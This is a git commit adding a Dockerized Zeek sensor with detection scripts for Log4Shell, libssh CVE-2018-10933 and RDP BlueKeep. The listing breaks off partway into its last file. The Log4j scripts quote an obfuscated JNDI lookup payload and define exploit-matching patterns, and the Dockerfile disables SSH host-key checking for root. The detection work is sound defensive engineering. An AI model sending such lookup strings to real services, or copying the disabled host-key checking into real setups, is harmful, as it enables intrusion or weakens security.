Inital

2025-05-28 14:31:31 -04:00 · 2025-05-28 14:31:31 -04:00 · 04da5c1250
commit 04da5c1250
110 changed files with 9968 additions and 0 deletions
--- a/92
+++ b/92
@ -0,0 +1,92 @@
+ARG PLATFORM=linux/amd64
+FROM ubuntu:noble
+
+ENV ZEEK_HOME=/usr/local/zeek
+ENV PATH="${ZEEK_HOME}/bin:${PATH}"
+
+USER root
+
+# Install system dependencies
+RUN apt-get update && apt-get install -y \
+    wget cmake make gcc g++ flex bison libfl-dev libpcap-dev libssl-dev build-essential \
+    python3 python3-dev swig zlib1g-dev python3-pip \
+    libmaxminddb-dev libnghttp2-dev libbrotli-dev \
+    git net-tools iproute2 wget nodejs lshw ethtool nano \
+    sendmail cron gettext ca-certificates python3-requests python3-jinja2 python3-yaml \
+    libcap2-bin passwd openssh-server openssh-client iputils-ping rsync && \
+    update-ca-certificates
+
+# Install Python Package Requirements
+RUN pip3 install GitPython semantic-version zkg --break-system-packages
+
+## Create user and group
+#RUN groupadd -g 9000 cyber-user-group && \
+#    useradd -r -u 9000 -g cyber-user-group -m zeek
+
+# Build Zeek from source
+WORKDIR /opt
+RUN git clone --recursive https://git.leargas.io/pk/zeek && \
+    cd zeek && \
+    ./configure --prefix=${ZEEK_HOME} && \
+    make && \
+    make install && \
+    ln -sfn ${ZEEK_HOME} /usr/local/zeek
+
+# Set up directories and permissions
+#RUN mkdir -p /data/bro/logs /data/bro/spool && \
+#    chown -R zeek:cyber-user-group /data/bro && \
+RUN    mkdir -p /usr/local/zeek/share/zeek/site/scripts/capitalone
+
+# Copy local content for Zeek site (must be in build context)
+COPY capitalone /usr/local/zeek/share/zeek/site/scripts/capitalone
+
+# Install Zeek plugins using zkg
+RUN zkg autoconfig --force && \
+    zkg install --force https://git.leargas.io/pk/bzar   && \
+    zkg install --force https://git.leargas.io/pk/hassh  && \
+    zkg install --force https://git.leargas.io/pk/ja3    && \
+    zkg install --force https://git.leargas.io/pk/file-extraction && \
+    zkg install --force https://git.leargas.io/pk/mdns || true
+
+# Apply raw/net admin capabilities and cleanup
+RUN setcap cap_net_raw,cap_net_admin=eip ${ZEEK_HOME}/bin/zeek || true && \
+    setcap cap_net_raw,cap_net_admin=eip ${ZEEK_HOME}/bin/capstats || true && \
+    setcap cap_net_raw,cap_net_admin=eip ${ZEEK_HOME}/bin/zeekctl || true && \
+    apt-get remove -y wget && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/* /opt/zeek
+
+# SSH & cron setup
+RUN mkdir -p /var/run/sshd /etc/ssh && \
+    mkdir -p /root/.ssh && \
+    echo 'Host *\n  StrictHostKeyChecking no\n  UserKnownHostsFile=/dev/null' > /root/.ssh/config && \
+    chmod 600 /root/.ssh/config && \
+    ssh-keygen -A
+
+# Copy configuration files (must be in build context)
+COPY local.zeek ${ZEEK_HOME}/share/zeek/site/local.zeek
+COPY zeekctl.cfg ${ZEEK_HOME}/etc/zeekctl.cfg
+COPY GeoLite2-City.mmdb /opt/GeoLite2-City.mmdb
+
+# Set permissions on MMDB
+#RUN chmod 644 /opt/GeoLite2-City.mmdb && \
+#    chown zeek:cyber-user-group /opt/GeoLite2-City.mmdb
+
+# Final CMD
+CMD bash -c '\
+  echo "[INFO] Disabling NIC offloading (if interfaces exist)..." && \
+  for i in enp0s3 ens33 ens34 ens192 ens160 eth0 eth1 eth4 eth5 br0 enp11s0f1 enp11s0f0 enp10s0f1 enp10s0f0; do \
+    if ip link show "$i" &>/dev/null; then \
+      echo "[INFO] Tuning $i..." && \
+      for n in lro tso gso gro; do \
+        /sbin/ethtool -K "$i" "$n" off 2>/dev/null || true; \
+      done; \
+    fi; \
+  done && \
+  echo "[INFO] Starting SSH daemon and cron..." && \
+  service cron start && \
+  /usr/sbin/sshd && \
+  echo "[INFO] Starting Zeek..." && \
+  su - zeek -c "zeekctl deploy" && \
+  tail -f /dev/null'
+
--- a/Dockerfile.orig
+++ b/Dockerfile.orig
@ -0,0 +1,81 @@
+ARG PLATFORM=linux/amd64
+FROM ubuntu:noble
+ENV ZEEK_HOME=/usr/local/zeek
+ENV PATH="${ZEEK_HOME}/bin:${PATH}"
+
+USER root
+
+# Install system dependencies
+RUN apt-get update && apt-get install -y \
+    wget cmake make gcc g++ flex bison libfl-dev libpcap-dev libssl-dev build-essential \
+    python3 python3-dev swig zlib1g-dev python3-pip \
+    libmaxminddb-dev libnghttp2-dev libbrotli-dev \
+    git net-tools iproute2 wget nodejs lshw ethtool nano \
+    sendmail cron gettext ca-certificates python3-requests python3-jinja2 python3-yaml \
+    libcap2-bin passwd && \
+    update-ca-certificates
+
+# Install Python Package Requirements
+RUN pip3 install GitPython semantic-version --break-system-packages
+
+# Create user and group
+RUN groupadd -g 9000 cyber-user-group && \
+    useradd -r -u 9000 -g cyber-user-group -m zeek
+
+# Build Zeek from source
+RUN cd /opt && \
+    git clone --recursive https://git.leargas.io/pk/zeek && \
+    cd zeek && \
+    ./configure --prefix=${ZEEK_HOME} && \
+    make && \
+    make install && \
+    ln -s ${ZEEK_HOME} /usr/local/zeek
+
+# Set up directories and permissions
+RUN mkdir -p /data/bro/logs /data/bro/spool && \
+    chown -R zeek:cyber-user-group /data/bro && \
+    mkdir -p ${ZEEK_HOME}/share/zeek/site/scripts/capitalone && \
+    mv ${ZEEK_HOME}/etc ${ZEEK_HOME}/etc.bak && \
+    mkdir -p ${ZEEK_HOME}/etc
+
+# Install Zeek plugins using zkg
+RUN zkg autoconfig --force && \
+    zkg install --force https://git.leargas.io/pk/bzar   && \
+    zkg install --force https://git.leargas.io/pk/hassh  && \
+    zkg install --force https://git.leargas.io/pk/ja3    && \
+    zkg install --force https://git.leargas.io/pk/file-extraction && \
+    zkg install --force https://git.leargas.io/pk/mdns   && \
+    zkg install --force https://git.leargas.io/pk/geoip-conn || true
+
+# Apply raw/net admin capabilities and cleanup
+RUN setcap cap_net_raw,cap_net_admin=eip ${ZEEK_HOME}/bin/zeek || true && \
+    setcap cap_net_raw,cap_net_admin=eip ${ZEEK_HOME}/bin/capstats || true && \
+    setcap cap_net_raw,cap_net_admin=eip ${ZEEK_HOME}/bin/zeekctl || true && \
+    apt-get remove -y wget && \
+    apt-get clean && \
+    rm -rf /var/lib/apt/lists/* /opt/zeek
+
+# Copy configuration files
+COPY local.zeek ${ZEEK_HOME}/share/zeek/site/local.zeek
+COPY zeekctl.cfg ${ZEEK_HOME}/etc/zeekctl.cfg
+COPY GeoLite2-City.mmdb /opt/GeoLite2-City.mmdb
+
+# Set permissions on MMDB
+RUN chmod 644 /opt/GeoLite2-City.mmdb && \
+    chown zeek:cyber-user-group /opt/GeoLite2-City.mmdb
+
+# Final CMD includes NIC offload tuning + Zeek launch
+USER root
+CMD bash -c '\
+  echo "[INFO] Disabling NIC offloading (if interfaces exist)..." && \
+  for i in enp0s3 ens33 ens34 ens192 ens160 eth0 eth1 eth4 eth5 br0 enp11s0f1 enp11s0f0 enp10s0f1 enp10s0f0; do \
+    if ip link show "$i" &>/dev/null; then \
+      echo "[INFO] Tuning $i..." && \
+      for n in lro tso gso gro; do \
+        /sbin/ethtool -K "$i" "$n" off 2>/dev/null || true; \
+      done; \
+    fi; \
+  done && \
+  echo "[INFO] Starting Zeek..." && \
+  exec su - zeek -c "zeek --version"'
+
--- a/GeoLite2-City.mmdb
+++ b/GeoLite2-City.mmdb
--- a/GeoLite2-City_20250422/COPYRIGHT.txt
+++ b/GeoLite2-City_20250422/COPYRIGHT.txt
@ -0,0 +1 @@
+Database and Contents Copyright (c) 2025 MaxMind, Inc.
--- a/GeoLite2-City_20250422/LICENSE.txt
+++ b/GeoLite2-City_20250422/LICENSE.txt
@ -0,0 +1,3 @@
+Use of this MaxMind product is governed by MaxMind's GeoLite2 End User License Agreement, which can be viewed at https://www.maxmind.com/en/geolite2/eula.
+
+This database incorporates GeoNames [https://www.geonames.org] geographical data, which is made available under the Creative Commons Attribution 4.0 License. To view a copy of this license, visit https://creativecommons.org/licenses/by/4.0/.
--- a/GeoLite2-City_20250422/README.txt
+++ b/GeoLite2-City_20250422/README.txt
@ -0,0 +1 @@
+Latitude and longitude are not precise and should not be used to identify a particular street address or household.
--- a/build-push.sh
+++ b/build-push.sh
@ -0,0 +1,8 @@
+# Step 1: Build and load it
+docker build --no-cache --load -t pkelleyls/zeek-c1:7.2.0 .
+
+# Step 2: Tag for your registry
+docker tag pkelleyls/zeek-c1:7.2.0 192.168.30.23/capital-zeek/zeek-c1:latest
+
+# Step 3: Push it
+docker push 192.168.30.23/capital-zeek/zeek-c1:latest
--- a/build.log
+++ b/build.log
--- a/build.sh
+++ b/build.sh
@ -0,0 +1 @@
+docker build --no-cache -t pkelleyls/zeek-ics:6.0.4 . && docker build --tag pkelleyls/zeek-ics:6.0.4 --push .
--- a/capitalone/.DS_Store
+++ b/capitalone/.DS_Store
--- a/capitalone/load.zeek
+++ b/capitalone/load.zeek
@ -0,0 +1,2 @@
+
+@load ./main
--- a/capitalone/detect/.DS_Store
+++ b/capitalone/detect/.DS_Store
--- a/capitalone/detect/CVE_2021_44228.zeek
+++ b/capitalone/detect/CVE_2021_44228.zeek
@ -0,0 +1,127 @@
+module CVE_2021_44228;
+
+redef enum Notice::Type += {
+        LOG4J_ATTEMPT_HEADER,
+        LOG4J_SUCCESS
+    };
+
+redef enum HTTP::Tags += {
+        LOG4J_RCE
+    };
+
+redef enum Log::ID += { LOG };
+
+type Info: record {
+    ts: time &log;
+    uid: string &log;
+    http_uri: string &log;
+    uri: string &log;
+    stem: string &log;
+    target_host: string &log;
+    target_port: string &log;
+    method: string &log;
+    is_orig: bool &log;
+    name: string &log;
+    value: string &log;
+    matched_name: bool &log;
+    matched_value: bool &log;
+    };
+
+type PayloadParts: record {
+    uri: string;
+    stem: string;
+    host: string;
+    port_: string;
+    };
+
+# Very general, FPs expected but we're casting a wide net intentionally.
+global exploit_pattern: pattern = /\$\{/;
+export {
+    option log = T;
+}
+
+# If split doesn't return the expected number of indices, return the default "-"
+function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string
+    {
+    local tmp = split_string1(s, p);
+    if ( |tmp| > idx )
+        return tmp[idx];
+    else
+        return missing;
+    }
+
+# Assumes `name` or `value` string passed as `s` has the structure:
+# ${jdni:ldap://payload_host:payload_port/path} for the payload. Many examples
+# of more complicated obfuscation exist. If the structure is different, fill
+# missing fields with "-" so other structures in the wild can be explored in the
+# logs. For example, Binary Edge are using the following type of obfuscation:
+# ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}'
+function parse_payload(s: string): PayloadParts
+    {
+    local tmp = split_string(s, /\/\//);
+    local last: string = "-";
+    if ( |tmp| > 0 )
+        last = tmp[(|tmp| - 1)];
+    local payload_uri  = safe_split1_w_default(last, /\}/, 0);
+    local payload_stem = safe_split1_w_default(payload_uri, /\//, 0);
+    local payload_host = safe_split1_w_default(payload_stem, /\:/, 0);
+    local payload_port = safe_split1_w_default(payload_stem, /\:/, 1);
+
+    return PayloadParts($uri=payload_uri, $stem=payload_stem, $host=payload_host, $port_=payload_port);
+    }
+
+event http_header(c: connection, is_orig: bool, name: string, value: string)
+    {
+    # Focus is mainly on client headers, but not filtering right now to explore interesting cases in the wild
+    # if (!is_orig)
+    #     return;
+    # Focus is mainly on value of header, but adding 'name' to explore what is being used in the wild
+    local matched_name = exploit_pattern in name;
+    local matched_value = exploit_pattern in value;
+
+    # Ignore matches that contain binary goop. This was a large contributor to
+    # false positives.
+    if ( matched_name && !is_ascii(name) )
+        return;
+    if ( matched_value && !is_ascii(value) )
+        return;
+
+    add c$http$tags[LOG4J_RCE];
+
+    local payload: PayloadParts;
+    local info: Info;
+
+    # TODO: add to a clusterized set for watching of subsequent traffic (LOG4J_SUCCESS notice).
+    if ( matched_name )
+        {
+        payload = parse_payload(name);
+        info = Info($ts=network_time(), $uid=c$uid, $http_uri=c$http$uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=c$http$method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
+        NOTICE([$note=LOG4J_ATTEMPT_HEADER,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
+                # $suppress_for=3600sec,
+                $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
+                $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", c$http$uri, payload$uri, payload$stem, payload$host, payload$port_, c$http$method, is_orig, name, value)]);
+        if ( log )
+            Log::write(LOG, info);
+        }
+    if ( matched_value )
+        {
+        payload = parse_payload(value);
+        info = Info($ts=network_time(), $uid=c$uid, $http_uri=c$http$uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=c$http$method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
+        NOTICE([$note=LOG4J_ATTEMPT_HEADER,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
+                # $suppress_for=3600sec,
+                $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
+                $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", c$http$uri, payload$uri, payload$stem, payload$host, payload$port_, c$http$method, is_orig, name, value)]);
+        if ( log )
+            Log::write(LOG, info);
+        }
+    }
+
+event zeek_init() &priority=5
+    {
+    if ( log )
+        Log::create_stream(CVE_2021_44228::LOG, [$columns=Info, $path="log4j"]);
+    }
--- a/capitalone/detect/LIBSSH_CVE_2018_10933.zeek
+++ b/capitalone/detect/LIBSSH_CVE_2018_10933.zeek
@ -0,0 +1,45 @@
+# 
+#
+#
+module LIBSSH_CVE_2018_10933;
+
+export {
+    redef enum Log::ID += { LOG };
+    redef enum Notice::Type += { Vulnerable_Version };
+}
+
+event ssh_server_version(c: connection, version: string)
+{
+    if ("libssh" !in version) {
+        return;
+    }
+    
+    local vuln = F;
+    
+    # Ex: SSH-2.0-libssh_0.7.4
+    local sv = split_string(version, /_/);
+    
+    if (|sv| == 2) {
+        local ver = split_string(sv[1], /\./);
+
+
+
+        # 0.6.* and <0.7.6 is vulnerable to this CVE
+        if (to_count(ver[0]) == 0 && (to_count(ver[1]) == 7 || to_count(ver[1]) == 6) && to_count(ver[2]) < 6) {
+            vuln = T;
+        }
+        
+        # <0.8.4 is vulnerable to this CVE
+        if (to_count(ver[0]) == 0 && to_count(ver[1]) == 8 && to_count(ver[2]) < 4) {
+            vuln = T;
+        }
+        
+        if(!vuln) {
+            return;
+        }
+        
+        NOTICE([$note=LIBSSH_CVE_2018_10933::Vulnerable_Version,
+            $msg = fmt("Vulnerable version found - %s", sv[1]),
+            $conn = c]);
+    }
+}
--- a/capitalone/detect/RDP_CVE_2019_0708.zeek
+++ b/capitalone/detect/RDP_CVE_2019_0708.zeek
@ -0,0 +1,27 @@
+# Who               When            What
+# -----------------------------------------------------------------------------
+# Abye Aytaged      05/10/2020      Initial commit - CVE_2019_0708 Detection. The
+# portion of the RDP session that is likely to be exploited will be in clear text and
+# involves creating a “Static Virtual Channel” named “MS_T120.” This module will
+# log in notice.log whenever it detects an RDP channel with "MS_T120".
+#
+#
+module RDP_CVE_2019_0708;
+
+export {
+    redef enum Log::ID += { LOG };
+    redef enum Notice::Type += { Vulnerable_Version };
+
+}
+
+event rdp_client_network_data(c: connection, channels: RDP::ClientChannelList)
+{
+    for ( i in channels ) {
+    	if ( channels[i]$name == "MS_T120\x00" )
+    	{
+        	NOTICE([$note=RDP_CVE_2019_0708::Vulnerable_Version,
+        	$msg = fmt("RDP_CVE_2019_0708  - RDP connection setup with MS_T120 channel, potential CVE-2019-0708"),
+        	$conn = c]);
+    }
+  }
+}
--- a/capitalone/detect/load.zeek
+++ b/capitalone/detect/load.zeek
@ -0,0 +1 @@
+@load ./main
--- a/capitalone/detect/bro-is-darknet/load.zeek
+++ b/capitalone/detect/bro-is-darknet/load.zeek
@ -0,0 +1 @@
+@load ./main.zeek
--- a/capitalone/detect/bro-is-darknet/main.zeek
+++ b/capitalone/detect/bro-is-darknet/main.zeek
@ -0,0 +1,112 @@
+module Site;
+
+export {
+    # These should be figured out based on how large local_nets is
+    # if local_nets is a single /24, v4_aggregation_bits can be 32
+    ## When adding a host, truncate it to this many bits and assume the entire
+    ## subnet is in use
+
+    const v4_aggregation_bits = 24 &redef;
+    const v6_aggregation_bits = 64 &redef;
+
+    ## A set containing subnets from local_nets that are in use
+    global used_address_space: set[subnet] &redef;
+
+    ## A set containing subnets from local_nets that are dark
+    global darknet_address_space: set[subnet] &redef;
+
+    ## Return true if an address is dark
+    global is_darknet: function(a: addr): bool;
+
+    type DarknetMode: enum {
+        ## Only hosts defined in darknet_address_space are dark
+        DARKNET,
+
+        ## Only hosts NOT listed in used_address_space are dark
+        NOT_ALLOCATED,
+
+        ## Only hosts defined in darknet_address_space OR NOT listed in used_address_space are dark
+        ## Useful if you reuse part of darknet space for honey net purposes
+        DARKNET_OR_NOT_ALLOCATED,
+
+        ## Only hosts both defined in darknet_address_space AND NOT listed in used_address_space are dark
+        ## Useful if your networking group may reallocate your darknet subnets out from under you.
+        DARKNET_AND_NOT_ALLOCATED,
+    };
+    const darknet_mode: DarknetMode=DARKNET &redef;
+
+    ## Automatically add newly seen hosts to used_address_space after
+    ## truncating to v4_aggregation_bits or v6_aggregation_bits
+    const auto_manage_allocated: bool=F &redef;
+
+    redef enum Notice::Type += {
+    	     New_Used_Address_Space
+    };
+    global new_used_address_space: event(sn: subnet);
+}
+
+function aggregate_address(a: addr): subnet
+{
+    if(is_v4_addr(a)) {
+        return mask_addr(a, v4_aggregation_bits);
+    } else {
+        return mask_addr(a, v6_aggregation_bits);
+    }
+}
+
+######################################
+# Cluster mode
+@if ( Cluster::is_enabled() )
+event zeek_init()
+{
+    Broker::auto_publish(Cluster::manager_topic, Site::new_used_address_space);
+    Broker::auto_publish(Cluster::proxy_topic, Site::new_used_address_space);
+}
+
+event Site::new_used_address_space(sn: subnet)
+{
+    add used_address_space[sn];
+}
+@endif
+######################################
+
+function add_host(a: addr)
+{
+    if (a !in used_address_space) {
+        local masked = aggregate_address(a);
+        add used_address_space[masked];
+        event Site::new_used_address_space(masked);
+        NOTICE([$note=New_Used_Address_Space,
+                $identifier=fmt("%s",masked),
+                $msg=fmt("%s",masked)]);
+    }
+}
+
+function is_darknet(a: addr): bool
+{
+    switch ( darknet_mode) {
+    case DARKNET:
+        return (a in darknet_address_space);
+    case NOT_ALLOCATED:
+        return (a in local_nets && |used_address_space| != 0 && a !in used_address_space);
+    case DARKNET_OR_NOT_ALLOCATED:
+        return (a in darknet_address_space || (|used_address_space| != 0 && a in local_nets && a !in used_address_space));
+    case DARKNET_AND_NOT_ALLOCATED:
+        return (a in darknet_address_space && (|used_address_space| != 0 && a in local_nets && a !in used_address_space));
+    }
+    Reporter::error(fmt("Invalid darknet_mode %s(%d)", darknet_mode, darknet_mode));
+    return F;
+}
+
+#Similar to how known hosts works, but this will also catch udp only hosts.
+event Conn::log_conn(rec: Conn::Info)
+{
+    if (!auto_manage_allocated)
+        return;
+    if (|Site::local_nets| == 0)
+        return;
+    if (rec$local_orig && rec$orig_pkts > 0)
+        add_host(rec$id$orig_h);
+    if (rec$local_resp && rec$resp_pkts > 0)
+        add_host(rec$id$resp_h);
+}
--- a/capitalone/detect/log4j/CVE_2021_44228.zeek
+++ b/capitalone/detect/log4j/CVE_2021_44228.zeek
@ -0,0 +1,300 @@
+module CVE_2021_44228;
+# Refer to the following for a description of the methods used in script.
+# Headers: https://corelight.com/blog/simplifying-detection-of-log4shell
+# LDAP:    https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic
+
+@load-sigs ./ldap_java.sig
+
+export {
+    redef enum Notice::Type += {
+        LOG4J_ATTEMPT_HEADER,
+        LOG4J_LDAP_JAVA,
+        LOG4J_SUCCESS
+    };
+
+    option log = T;
+    # redef'd when running tests with btest. Leave as `F`.
+    option run_tests = F;
+
+    # Can be domains or addrs, so just have it be a string.
+    option ignorable_target_hosts: set[string] = {};
+    # Ignore hosts known to be benign & scanning for this behavior.
+    option ignorable_orig_hosts: set[subnet] = {10.96.64.0/23,10.96.66.0/23,10.96.68.0/23,10.5.114.0/23,10.189.56.0/23,10.189.58.0/23,10.189.60.0/23,10.205.62.224/28,10.205.63.224/28,10.203.63.32/28,10.203.63.48/28,10.187.13.32/28,10.187.13.48/28,10.96.64.0/22,10.189.56.0/22};
+    # Ignore resp hosts. `ignorable_orig_hosts` is probably what you want. This
+    # would be for (1) ignoring internal honeypots that you know will look
+    # "exploitable" or a known "malicious" server attempting to exploit
+    # vulnerable Java clients.
+    option ignorable_resp_hosts: set[addr] = {};
+
+    # Try to normalize payloads to improve change of successfully retrieving the
+    # payload information.
+    option try_normalize = T;
+
+    redef enum Log::ID += { LOG };
+
+    const log_path = "log4j" &redef;
+
+    global log_policy: Log::PolicyHook;
+}
+
+redef enum HTTP::Tags += {
+        LOG4J_RCE
+    };
+
+
+type Info: record {
+    ts: time &log;
+    uid: string &log;
+    http_uri: string &log;
+    uri: string &log;
+    stem: string &log;
+    target_host: string &log;
+    target_port: string &log;
+    method: string &log;
+    is_orig: bool &log;
+    name: string &log;
+    value: string &log;
+    matched_name: bool &log;
+    matched_value: bool &log;
+    };
+
+type PayloadParts: record {
+    uri: string;
+    stem: string;
+    host: string;
+    port_: string;
+    };
+
+# Very general, FPs expected but we're casting a wide net intentionally.
+# Approach:
+# Match ${
+# unless it's ${@ (php junk)
+# and only if it has a : in the middle and
+# and ending brace.
+# See test cases in zeek_init() for what we consider to be a TP/FP.
+global exploit_pattern: pattern = /\$\{[^@][^}]+:[^}]+\}/;
+
+# Stack used for `normalize`. Shouldn't be used outside of that function.
+global stack: vector of string;
+
+function peek(): string
+    {
+    if ( |stack| == 0 )
+        return "";
+    else
+        return stack[|stack|-1];
+    }
+
+function pop(): string
+    {
+    if ( |stack| == 0 )
+        return "";
+    local x = peek();
+    stack = stack[0:|stack|-1];
+    return x;
+    }
+
+function push(x: string)
+    {
+    stack += x;
+    }
+
+function clear_stack()
+    {
+    stack = vector();
+    }
+
+# Attempts to normalize log4j payload to remove most common obfuscations. There
+# are effectively an infinite number of ways to do this, so don't expect it to
+# cover everything. See tests in `zeek_init()` to understand what it handles.
+#
+# Algorithm works as follows:
+#
+# "$" and "{" are pushed onto the stack when encountered.
+# Set a flag to show we have seen the first "$" "{" set.
+# If we are on our second+ set of "$" "{", start ignoring characters
+# If we see a ":" while ignoring, we have passed the function portion and should stop ignoring.
+# When we hit a "}", pop the previous "{" and "$" off the stack. If the stack is
+# now empty, this was the first instance (i.e., `${jdni...`) and it should be
+# preserved, otherwise, remove it.
+function normalize(payload: string): string
+    {
+    # Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j}
+    payload = gsub(payload, /::\-/, ":");
+    local to_remove: set[count];
+    local i = 0;
+    local ignoring = F;
+    local saw_first = F;
+    while ( i != |payload| )
+        {
+        local c = payload[i];
+        switch ( c )
+            {
+            case "$":
+                push(c);
+                break;
+            case "{":
+                if ( peek() == "$" )
+                    push(c);
+                if ( !saw_first )
+                    {
+                    saw_first = T;
+                    }
+                else
+                    {
+                    # Add previous "$"
+                    add to_remove[i-1];
+                    ignoring = T;
+                    }
+                break;
+            case ":":
+                if ( ignoring )
+                    {
+                    add to_remove[i];
+                    ignoring = F;
+                    }
+                break;
+            case "}":
+                local open_brace = pop();
+                local dollar = pop();
+                # We only want to remove internal ones
+                if ( dollar == "$" && open_brace == "{" && |stack| > 0 )
+                    add to_remove[i];
+                break;
+            }
+
+        if ( ignoring )
+            add to_remove[i];
+        ++i;
+        }
+
+    local new_payload: vector of string;
+    i = 0;
+    while ( i != |payload| )
+        {
+        if ( i !in to_remove )
+            new_payload += payload[i];
+        ++i;
+        }
+    clear_stack();
+    return join_string_vec(new_payload, "");
+    }
+
+# If split doesn't return the expected number of indices, return the default "-"
+function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string
+    {
+    local tmp = split_string1(s, p);
+    if ( |tmp| > idx )
+        return tmp[idx];
+    else
+        return missing;
+    }
+
+# Assumes `name` or `value` string passed as `s` has the structure:
+# ${jdni:ldap://payload_host:payload_port/path} for the payload. Many examples
+# of more complicated obfuscation exist. If the structure is different, fill
+# missing fields with "-" so other structures in the wild can be explored in the
+# logs. For example, Binary Edge are using the following type of obfuscation:
+# ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}'
+function parse_payload(s: string): PayloadParts
+    {
+    if ( try_normalize )
+        s = normalize(s);
+    local tmp = split_string(s, /\/\//);
+    local last: string = "-";
+    if ( |tmp| > 0 )
+        last = tmp[(|tmp| - 1)];
+    local payload_uri  = safe_split1_w_default(last, /\}/, 0);
+    local payload_stem = safe_split1_w_default(payload_uri, /\//, 0);
+    local payload_host = safe_split1_w_default(payload_stem, /\:/, 0);
+    local payload_port = safe_split1_w_default(payload_stem, /\:/, 1);
+
+    return PayloadParts($uri=payload_uri, $stem=payload_stem, $host=payload_host, $port_=payload_port);
+    }
+
+event http_header(c: connection, is_orig: bool, name: string, value: string)
+    {
+    if ( c$id$orig_h in ignorable_orig_hosts )
+        return;
+    if ( c$id$resp_h in ignorable_resp_hosts )
+        return;
+    # Focus is mainly on client headers, but not filtering right now to explore interesting cases in the wild
+    # if (!is_orig)
+    #     return;
+    # Focus is mainly on value of header, but adding 'name' to explore what is being used in the wild
+    local matched_name = exploit_pattern in name;
+    local matched_value = exploit_pattern in value;
+    local http_uri: string = "";
+    local http_method: string = "";
+
+    # Handle potentially missing fields
+    if ( c$http?$uri )
+        http_uri = c$http$uri;
+    if ( c$http?$method )
+        http_method = c$http$method;
+
+    # Ignore matches that contain binary goop. This was a large contributor to
+    # false positives.
+    if ( matched_name && !is_ascii(name) )
+        return;
+    if ( matched_value && !is_ascii(value) )
+        return;
+
+    if ( !matched_name && !matched_value )
+        return;
+
+    add c$http$tags[LOG4J_RCE];
+
+    local payload: PayloadParts;
+    local info: Info;
+
+    # TODO: add to a clusterized set for watching of subsequent traffic (LOG4J_SUCCESS notice).
+    if ( matched_name )
+        {
+        payload = parse_payload(name);
+        if ( payload$host in ignorable_target_hosts )
+            return;
+        info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
+        NOTICE([$note=LOG4J_ATTEMPT_HEADER,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
+                # $suppress_for=3600sec,
+                $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
+                $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]);
+        if ( log )
+            Log::write(LOG, info);
+        }
+    if ( matched_value )
+        {
+        payload = parse_payload(value);
+        if ( payload$host in ignorable_target_hosts )
+            return;
+        info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value);
+        NOTICE([$note=LOG4J_ATTEMPT_HEADER,
+                $conn=c,
+                $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)),
+                # $suppress_for=3600sec,
+                $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"),
+                $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s',  header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]);
+        if ( log )
+            Log::write(LOG, info);
+        }
+    }
+
+event signature_match(state: signature_state, msg: string, data: string)
+    {
+    if ( !(msg == "log4j_javaclassname_udp" || msg == "log4j_javaclassname_tcp") )
+       return;
+
+    NOTICE([$note=LOG4J_LDAP_JAVA,
+            $conn=state$conn,
+            $identifier=cat(state$conn$id$orig_h,state$conn$id$resp_h,state$conn$id$resp_p),
+            # $suppress_for=3600sec,
+            $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload."),
+            $sub=data]);
+    }
+
+event zeek_init() &priority=5
+    {
+    Log::create_stream(CVE_2021_44228::LOG, [$columns=Info, $path=log_path, $policy=log_policy]);
+    }
--- a/capitalone/detect/log4j/CVE_2021_44228_java_GET.zeek
+++ b/capitalone/detect/log4j/CVE_2021_44228_java_GET.zeek
@ -0,0 +1,75 @@
+module CVE_2021_44228;
+# Refer to the following for a description of the method used in script.
+# https://corelight.com/blog/detecting-log4j-exploits-via-zeek-when-java-downloads-java
+
+redef enum Notice::Type += {
+    LOG4J_JAVA_CLASS_DOWNLOAD,
+    };
+
+redef record HTTP::Info += {
+    CVE_2021_44228_content_type: string &optional;
+    CVE_2021_44228_detected: bool &default = F;
+    };
+
